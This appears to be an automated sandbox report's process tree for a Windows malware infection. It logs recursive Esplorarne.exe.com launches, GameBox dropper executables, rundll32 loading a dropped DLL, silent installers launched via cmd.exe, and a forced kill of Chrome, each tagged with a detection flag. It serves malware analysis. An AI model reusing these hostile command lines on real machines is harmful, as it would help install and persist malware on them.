                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              42⤵
                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                              PID:7008
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                43⤵
                                                                                                                                                                                                                                                  PID:8352
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    44⤵
                                                                                                                                                                                                                                                      PID:6444
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        45⤵
                                                                                                                                                                                                                                                          PID:5632
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            46⤵
                                                                                                                                                                                                                                                              PID:9128
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                47⤵
                                                                                                                                                                                                                                                                  PID:7140
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    48⤵
                                                                                                                                                                                                                                                                      PID:8616
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                        49⤵
                                                                                                                                                                                                                                                                          PID:8340
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            50⤵
                                                                                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                51⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                PID:4860
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  52⤵
                                                                                                                                                                                                                                                                                    PID:2780
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      53⤵
                                                                                                                                                                                                                                                                                        PID:8904
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                          54⤵
                                                                                                                                                                                                                                                                                            PID:7192
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                              55⤵
                                                                                                                                                                                                                                                                                                PID:4996
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                  56⤵
                                                                                                                                                                                                                                                                                                    PID:6296
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                      57⤵
                                                                                                                                                                                                                                                                                                        PID:8956
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                          58⤵
                                                                                                                                                                                                                                                                                                            PID:4980
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                              59⤵
                                                                                                                                                                                                                                                                                                                PID:8100
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                  60⤵
                                                                                                                                                                                                                                                                                                                    PID:6780
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                      61⤵
                                                                                                                                                                                                                                                                                                                        PID:5568
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                          62⤵
                                                                                                                                                                                                                                                                                                                            PID:8204
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                              63⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                              PID:4520
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                64⤵
                                                                                                                                                                                                                                                                                                                                  PID:7880
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                    65⤵
                                                                                                                                                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                        66⤵
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                                                        PID:7804
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                          67⤵
                                                                                                                                                                                                                                                                                                                                            PID:6592
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                              68⤵
                                                                                                                                                                                                                                                                                                                                                PID:1328
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                  69⤵
                                                                                                                                                                                                                                                                                                                                                    PID:5220
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                      70⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1348
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                          71⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2208
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                              72⤵
                                                                                                                                                                                                                                                                                                                                                                PID:2804
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                  73⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8260
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                      74⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:4384
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                          75⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:8864
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                              76⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:7704
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                  77⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7192
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                      78⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5988
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                          79⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:7820
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                              80⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:5476
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                  ping GFBFPSXA -n 30
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                  PID:8160
                                                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:3004
                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:5896
                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:4084
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4536716.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4536716.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:6128
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\8471303.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\8471303.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5461710.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5461710.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:4664
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4040011.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4040011.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:5320
                                                                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:4944
                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:4284
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5100
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:5360
                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          PID:3964
                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                            PID:60
                                                                                                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:3840
                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                            PID:3172
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:1164
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:4360
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                PID:5244
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:6000
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                PID:5672
                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              PID:8272
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                PID:6856
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-DNJ3M.tmp\MediaBurner2.tmp
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-DNJ3M.tmp\MediaBurner2.tmp" /SL5="$1030E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            PID:5264
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-4K09U.tmp\3377047_logo_media.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-4K09U.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                              PID:3336
                                                                                                                                                                                                                                              • C:\Program Files\Windows Security\TMTCDSUYVM\ultramediaburner.exe
                                                                                                                                                                                                                                                "C:\Program Files\Windows Security\TMTCDSUYVM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:8036
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-8C8VR.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-8C8VR.tmp\ultramediaburner.tmp" /SL5="$303C4,281924,62464,C:\Program Files\Windows Security\TMTCDSUYVM\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                    PID:8140
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:7268
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\b5-7c8ae-c06-25bb3-06e7e6480fa56\Vaemimaevaevi.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\b5-7c8ae-c06-25bb3-06e7e6480fa56\Vaemimaevaevi.exe"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                                    PID:7220
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\da-870f3-5a5-87c9a-48f0521006a39\Vyhyfaebamo.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\da-870f3-5a5-87c9a-48f0521006a39\Vyhyfaebamo.exe"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:7292
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uq3pci1a.dyl\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:7580
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uq3pci1a.dyl\GcleanerEU.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\uq3pci1a.dyl\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:6780
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cdtboq2.1wq\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:6928
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5cdtboq2.1wq\installer.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5cdtboq2.1wq\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                PID:1420
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2z3rzxph.t3y\ufgaa.exe & exit
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:8084
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1edp00gb.j1c\anyname.exe & exit
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:8508
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1edp00gb.j1c\anyname.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1edp00gb.j1c\anyname.exe
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:8900
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1edp00gb.j1c\anyname.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1edp00gb.j1c\anyname.exe" -q
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:6460
                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkyrvj3z.zkr\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:9036
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bkyrvj3z.zkr\gcleaner.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bkyrvj3z.zkr\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:8328
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bgyyep0l.o00\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                          PID:7068
                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                    PID:1548
                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 1E96063B1E96208D2A3BDB0FA5A625CA C
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      PID:4496
